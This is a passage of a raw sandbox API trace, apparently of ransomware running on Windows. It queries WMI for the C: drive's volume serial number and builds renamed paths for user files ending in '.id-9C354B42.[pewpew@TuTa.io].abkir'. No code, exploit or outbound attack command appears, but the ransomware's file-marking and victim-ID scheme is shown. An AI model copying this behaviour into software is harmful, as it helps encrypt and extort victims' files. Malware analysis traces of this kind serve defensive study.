lFlags=2, puBuffLength=0x949e998*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e998*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.007] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a0d0, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0204.007] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a0d0, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0204.007] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a0d0, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0204.007] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a0d0, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0204.008] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a0d0, puCount=0x949e91c | out: puCount=0x949e91c*=0x0) returned 0x0 [0204.008] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e908 | out: puCount=0x949e908*=0x2) returned 0x0 [0204.008] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0x0, pszText=0x0 | out: puBuffLength=0x949e904*=0xf, pszText=0x0) returned 0x0 [0204.008] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e904*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.008] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8b8 | out: ppv=0x949e8b8*=0xb51e34) returned 0x0 [0204.008] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8b0 | out: pAptType=0x949e8b0*=1) returned 0x0 [0204.008] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x0) returned 0x80004002 [0204.008] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.009] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e220 | out: ppv=0x949e220*=0x6027240) returned 0x0 [0204.009] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027240, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e438 | out: ppvObject=0x949e438*=0x0) returned 0x80004002 [0204.009] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027240, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e44c | out: ppvObject=0x949e44c*=0x602a140) returned 0x0 [0204.009] WbemDefPath:IUnknown:Release (This=0x6027240) returned 0x0 [0204.009] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a140, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e06c | out: ppvObject=0x949e06c*=0x602a140) returned 0x0 [0204.009] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a140, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e028 | out: ppvObject=0x949e028*=0x0) returned 0x80004002 [0204.009] WbemDefPath:IUnknown:AddRef (This=0x602a140) returned 0x3 [0204.009] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a140, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d984 | out: ppvObject=0x949d984*=0x0) returned 0x80004002 [0204.009] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a140, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d934 | out: ppvObject=0x949d934*=0x0) returned 0x80004002 [0204.009] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a140, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d940 | out: ppvObject=0x949d940*=0x66ce348) returned 0x0 [0204.009] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce348, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d948 | out: pCid=0x949d948*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.009] WbemDefPath:IUnknown:Release (This=0x66ce348) returned 0x3 [0204.010] CoGetContextToken (in: pToken=0x949d9a0 | out: pToken=0x949d9a0) returned 0x0 [0204.010] CoGetContextToken (in: pToken=0x949dda8 | out: pToken=0x949dda8) returned 0x0 [0204.010] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a140, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de38 | out: ppvObject=0x949de38*=0x0) returned 0x80004002 [0204.010] WbemDefPath:IUnknown:Release (This=0x602a140) returned 0x2 [0204.010] WbemDefPath:IUnknown:Release (This=0x602a140) returned 0x1 [0204.010] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0204.010] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0204.010] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a140, riid=0x949e760*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e75c | out: ppvObject=0x949e75c*=0x602a140) returned 0x0 [0204.010] WbemDefPath:IUnknown:AddRef (This=0x602a140) returned 0x3 [0204.010] WbemDefPath:IUnknown:Release (This=0x602a140) returned 0x2 [0204.010] WbemDefPath:IWbemPath:SetText (This=0x602a140, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0204.010] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a140, puCount=0x949e8e0 | out: puCount=0x949e8e0*=0x2) returned 0x0 [0204.010] WbemDefPath:IWbemPath:GetText (in: This=0x602a140, lFlags=4, puBuffLength=0x949e8dc*=0x0, pszText=0x0 | out: puBuffLength=0x949e8dc*=0xf, pszText=0x0) returned 0x0 [0204.010] WbemDefPath:IWbemPath:GetText (in: This=0x602a140, lFlags=4, puBuffLength=0x949e8dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.010] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8e0 | out: ppv=0x949e8e0*=0xb51e34) returned 0x0 [0204.010] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8d8 | out: pAptType=0x949e8d8*=1) returned 0x0 [0204.010] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8dc | out: ppvObject=0x949e8dc*=0x0) returned 0x80004002 [0204.010] IUnknown:Release (This=0xb51e34) returned 0x1 [0204.011] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e500 | out: ppv=0x949e500*=0x6023a80) returned 0x0 [0204.011] WbemLocator:IUnknown:QueryInterface (in: This=0x6023a80, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e718 | out: ppvObject=0x949e718*=0x0) returned 0x80004002 [0204.011] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023a80, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e72c | out: ppvObject=0x949e72c*=0x6027200) returned 0x0 [0204.011] WbemLocator:IUnknown:Release (This=0x6023a80) returned 0x0 [0204.011] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e34c | out: ppvObject=0x949e34c*=0x6027200) returned 0x0 [0204.011] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e308 | out: ppvObject=0x949e308*=0x0) returned 0x80004002 [0204.011] WbemLocator:IUnknown:AddRef (This=0x6027200) returned 0x3 [0204.012] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc64 | out: ppvObject=0x949dc64*=0x0) returned 0x80004002 [0204.012] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc14 | out: ppvObject=0x949dc14*=0x0) returned 0x80004002 [0204.012] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc20 | out: ppvObject=0x949dc20*=0x0) returned 0x80004002 [0204.012] CoGetContextToken (in: pToken=0x949dc80 | out: pToken=0x949dc80) returned 0x0 [0204.012] CoGetContextToken (in: pToken=0x949e088 | out: pToken=0x949e088) returned 0x0 [0204.012] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e118 | out: ppvObject=0x949e118*=0x0) returned 0x80004002 [0204.012] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x2 [0204.012] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x1 [0204.012] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0204.012] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0204.012] WbemLocator:IUnknown:QueryInterface (in: This=0x6027200, riid=0x949e728*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e724 | out: ppvObject=0x949e724*=0x6027200) returned 0x0 [0204.012] WbemLocator:IUnknown:AddRef (This=0x6027200) returned 0x3 [0204.012] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x2 [0204.012] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a140, puCount=0x949e8bc | out: puCount=0x949e8bc*=0x2) returned 0x0 [0204.012] WbemDefPath:IWbemPath:GetText (in: This=0x602a140, lFlags=8, puBuffLength=0x949e8b8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8b8*=0xf, pszText=0x0) returned 0x0 [0204.012] WbemDefPath:IWbemPath:GetText (in: This=0x602a140, lFlags=8, puBuffLength=0x949e8b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.012] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e794 | out: ppv=0x949e794*=0x6027210) returned 0x0 [0204.012] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027210, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e828 | out: ppNamespace=0x949e828*=0x603373c) returned 0x0 [0204.399] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6c4 | out: ppvObject=0x949e6c4*=0xb5b4f4) returned 0x0 [0204.399] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b4f4, pProxy=0x603373c, pAuthnSvc=0x949e714, pAuthzSvc=0x949e710, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c, pImpLevel=0x949e6fc, pAuthInfo=0x949e700, pCapabilites=0x949e704 | out: pAuthnSvc=0x949e714*=0xa, pAuthzSvc=0x949e710*=0x0, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c*=0x6, pImpLevel=0x949e6fc*=0x2, pAuthInfo=0x949e700, pCapabilites=0x949e704*=0x1) returned 0x0 [0204.399] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x1 [0204.399] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b8 | out: ppvObject=0x949e6b8*=0xb5b514) returned 0x0 [0204.399] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b4 | out: ppvObject=0x949e6b4*=0xb5b4f4) returned 0x0 [0204.400] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b4f4, pProxy=0x603373c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0204.400] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x2 [0204.400] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0204.400] CoTaskMemFree (pv=0xbd4a68) [0204.400] WbemLocator:IUnknown:Release (This=0x6027210) returned 0x0 [0204.400] WbemLocator:IUnknown:QueryInterface (in: This=0x603373c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2b4 | out: ppvObject=0x949e2b4*=0xb5b514) returned 0x0 [0204.400] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e270 | out: ppvObject=0x949e270*=0x0) returned 0x80004002 [0204.401] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e08c | out: ppvObject=0x949e08c*=0x0) returned 0x80004002 [0204.402] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0204.402] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbcc | out: ppvObject=0x949dbcc*=0x0) returned 0x80004002 [0204.402] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db7c | out: ppvObject=0x949db7c*=0x0) returned 0x80004002 [0204.471] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db88 | out: ppvObject=0x949db88*=0xb5b474) returned 0x0 [0204.472] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b474, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949db90 | out: pCid=0x949db90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.472] WbemLocator:IUnknown:Release (This=0xb5b474) returned 0x3 [0204.472] CoGetContextToken (in: pToken=0x949dbe8 | out: pToken=0x949dbe8) returned 0x0 [0204.472] CoGetContextToken (in: pToken=0x949db98 | out: pToken=0x949db98) returned 0x0 [0204.472] CoGetContextToken (in: pToken=0x949dff0 | out: pToken=0x949dff0) returned 0x0 [0204.472] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e080 | out: ppvObject=0x949e080*=0xb5b4fc) returned 0x0 [0204.472] WbemLocator:IRpcOptions:Query (in: This=0xb5b4fc, pPrx=0xb5b514, dwProperty=2, pdwValue=0x949e0a8 | out: pdwValue=0x949e0a8) returned 0x80004002 [0204.472] WbemLocator:IUnknown:Release (This=0xb5b4fc) returned 0x3 [0204.472] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0204.472] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0204.472] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0204.472] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x949e5f8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e5f4 | out: ppvObject=0x949e5f4*=0x603373c) returned 0x0 [0204.472] WbemLocator:IUnknown:AddRef (This=0x603373c) returned 0x4 [0204.472] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x3 [0204.472] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x2 [0204.472] SysStringLen (param_1=0x0) returned 0x0 [0204.472] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a0d0, puCount=0x949e98c | out: puCount=0x949e98c*=0x0) returned 0x0 [0204.472] WbemDefPath:IWbemPath:GetText (in: This=0x602a0d0, lFlags=2, puBuffLength=0x949e988*=0x0, pszText=0x0 | out: puBuffLength=0x949e988*=0x20, pszText=0x0) returned 0x0 [0204.472] WbemDefPath:IWbemPath:GetText (in: This=0x602a0d0, lFlags=2, puBuffLength=0x949e988*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e988*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.472] CoGetContextToken (in: pToken=0x949e5f8 | out: pToken=0x949e5f8) returned 0x0 [0204.472] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0204.472] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e48c | out: ppvObject=0x949e48c*=0xb5b514) returned 0x0 [0204.473] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x3 [0204.473] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0204.473] WbemDefPath:IWbemPath:GetText (in: This=0x602a0d0, lFlags=2, puBuffLength=0x949e990*=0x0, pszText=0x0 | out: puBuffLength=0x949e990*=0x20, pszText=0x0) returned 0x0 [0204.473] WbemDefPath:IWbemPath:GetText (in: This=0x602a0d0, lFlags=2, puBuffLength=0x949e990*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e990*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.473] IWbemServices:GetObject (in: This=0x603373c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e944*=0x0, ppCallResult=0x0 | out: ppObject=0x949e944*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0204.561] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a140, puCount=0x949e944 | out: puCount=0x949e944*=0x2) returned 0x0 [0204.561] WbemDefPath:IWbemPath:GetText (in: This=0x602a140, lFlags=4, puBuffLength=0x949e940*=0x0, pszText=0x0 | out: puBuffLength=0x949e940*=0xf, pszText=0x0) returned 0x0 [0204.561] WbemDefPath:IWbemPath:GetText (in: This=0x602a140, lFlags=4, puBuffLength=0x949e940*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e940*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.562] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e940*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3611328*=0, plFlavor=0x361132c*=0 | out: pVal=0x949e940*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3611328*=8, plFlavor=0x361132c*=0) returned 0x0 [0204.562] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.562] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.562] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e948*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3611328*=8, plFlavor=0x361132c*=0 | out: pVal=0x949e948*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3611328*=8, plFlavor=0x361132c*=0) returned 0x0 [0204.562] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.562] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.562] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", lpFilePart=0x0) returned 0x89 [0204.562] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xac [0204.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9a8) returned 1 [0204.562] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), fInfoLevelId=0x0, lpFileInformation=0x949ea24 | out: lpFileInformation=0x949ea24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x332de080, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, 